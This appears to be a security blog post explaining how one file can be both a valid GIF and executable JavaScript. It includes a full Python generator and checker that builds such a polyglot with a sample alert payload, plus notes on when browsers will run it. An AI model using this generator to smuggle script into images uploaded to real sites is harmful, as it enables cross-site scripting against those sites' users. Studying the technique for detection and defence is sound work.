A dirty little technique: JavaScript embedded in GIF images, where the picture is still a valid GIF and is still rendered by any browser. The following HTML page loads the same file twice, once as an image and once as a script. Can one file be a strictly valid GIF and a strictly valid JavaScript file at the same time? The answer should be NO, but by forging the file correctly the answer becomes YES.
If we load the page, the result speaks for itself.
As we can see, both tags succeed: the IMG tag does its job and renders the GIF image (the “TEST IMAGE”), and in the same way the SCRIPT tag runs the file as script and shows the ALERT. How is this possible?
The following image shows the details of the dirty code that generates the GIF file.
This is neither witchcraft nor black magic; it is just an implementation error in GIF parsing, and many libraries share it. The idea behind the Python code is to build a valid GIF header that contains the bytes 0x2F 0x2A (that is, `/*`, the opening of a JavaScript block comment) and then, at the end of the image, close that comment with 0x2A 0x2F (`*/`) before injecting the payload. Because the GIF signature (`GIF89a`) is itself a valid JavaScript identifier, the interpreter sees the signature, then one long comment containing the whole binary image, and then whatever follows `*/`. After the comment it is enough to inject a simple expression such as `= 1` or, more commonly, `= a;`, so that the entire GIF is consumed as a single variable assignment.
The following image shows the first part of the GIF header used to exploit this weakness.
The bytes placed as “filler”, in this case `= a;`, are characters that are meaningful to the JS interpreter, and that is why the same file can be processed by two tags, IMG and SCRIPT, in any browser.
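As an added example, not the post's own Python script, the following code builds a GIF/JavaScript polyglot of exactly this shape and then checks both views of the file: a minimal GIF structure walker that, like a lenient browser decoder, stops at the trailer and ignores the trailing bytes, and a function that strips the block comment to show what the JS tokenizer sees. The 1x1 pixel image bytes and the payload `=1;alert('TEST IMAGE');` are constructed sample data for this example; the width bytes `/*` give a logical screen width of 0x2A2F (10799 px), which decoders accept because the image descriptor inside is still a 1x1 pixel.

```python
# Added example (not the original post's script): GIF/JS polyglot generator
# plus the two checks a practitioner would want (GIF still parses, JS is clean).
import struct

GIF_SIGNATURE = b"GIF89a"   # also a valid JavaScript identifier
COMMENT_OPEN = b"/*"        # 0x2F 0x2A, used as the logical-screen width bytes
COMMENT_CLOSE = b"*/"       # 0x2A 0x2F, appended right after the GIF trailer
TRAILER = b"\x3b"           # GIF trailer; decoders stop reading here


def build_polyglot(js_payload: bytes = b"=1;alert('TEST IMAGE');") -> bytes:
    """Return bytes that are simultaneously a 1x1 GIF and a JavaScript program.

    GIF view: GIF89a | LSD (width 0x2A2F, height 1, 2-colour GCT) | GCT |
              image descriptor 1x1 | LZW data | trailer | ignored tail
    JS view:  GIF89a /* ...binary... */ =1;alert('TEST IMAGE');
    The payload is an assumed sample; any JS that follows "=1;" works the same way.
    """
    # Logical screen descriptor: width bytes are "/*" (little-endian 0x2A2F),
    # height 1, packed 0x80 = global colour table with 2 entries, bg 0, aspect 0.
    lsd = COMMENT_OPEN + struct.pack("<H", 1) + b"\x80\x00\x00"
    gct = b"\x00\x00\x00" + b"\xff\xff\xff"            # black, white
    image_descriptor = b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"
    # LZW minimum code size 2, one 2-byte sub-block encoding (clear, index 0,
    # end-of-information), then the zero-length block terminator.
    lzw = b"\x02" + b"\x02\x44\x01" + b"\x00"
    gif = GIF_SIGNATURE + lsd + gct + image_descriptor + lzw + TRAILER
    # An accidental "*/" inside the image would end the JS comment early and
    # hand the tokenizer raw binary; with real pixel data this must be checked.
    if COMMENT_CLOSE in gif[len(GIF_SIGNATURE) + len(COMMENT_OPEN):]:
        raise ValueError("image data contains */; choose different pixel data")
    return gif + COMMENT_CLOSE + js_payload


def parse_gif(data: bytes) -> dict:
    """Minimal GIF structure walker, lenient the way browser decoders are:
    it stops at the trailer and returns whatever follows as 'tail'."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    width, height, packed, _bg, _aspect = struct.unpack("<HHBBB", data[6:13])
    pos = 13
    if packed & 0x80:                          # global colour table present
        pos += 3 * (2 << (packed & 0x07))
    while True:
        block = data[pos]
        pos += 1
        if block == 0x3B:                      # trailer: stop, ignore the rest
            break
        if block == 0x2C:                      # image descriptor (9 bytes)
            pos += 9
            ipacked = data[pos - 1]
            if ipacked & 0x80:                 # local colour table
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1                           # LZW minimum code size
        elif block == 0x21:                    # extension: one label byte
            pos += 1
        else:
            raise ValueError("unknown block 0x%02x at %d" % (block, pos - 1))
        while data[pos] != 0:                  # data sub-blocks until terminator
            pos += 1 + data[pos]
        pos += 1
    return {"width": width, "height": height,
            "trailer_offset": pos - 1, "tail": data[pos:]}


def js_view(data: bytes) -> str:
    """What the JavaScript tokenizer effectively sees once the block comment
    that hides the binary image is removed."""
    start = data.index(COMMENT_OPEN)
    end = data.index(COMMENT_CLOSE, start + len(COMMENT_OPEN))
    return (data[:start] + data[end + len(COMMENT_CLOSE):]).decode("ascii")


if __name__ == "__main__":
    blob = build_polyglot()
    with open("test.gif", "wb") as fh:      # load it with <img src> and <script src>
        fh.write(blob)
    print(parse_gif(blob)["width"], parse_gif(blob)["height"], js_view(blob))
```

Two caveats when reproducing this: the assignment `GIF89a=1` relies on sloppy-mode JavaScript creating an implicit global (under `"use strict"` it throws a ReferenceError before the payload runs, so prefer a payload that does not depend on the assignment succeeding), and the browser only executes the file as script if the server does not send `X-Content-Type-Options: nosniff` with an image MIME type.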